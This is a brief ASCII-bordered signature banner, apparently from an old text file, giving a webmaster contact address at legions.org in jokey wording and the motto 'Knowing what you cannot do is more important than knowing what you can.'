============================================================================= || Leave comments, death threats, and ideas to webmaster@legions.org || ============================================================================= || Knowing what you cannot do is more important than knowing what you can. || =============================================================================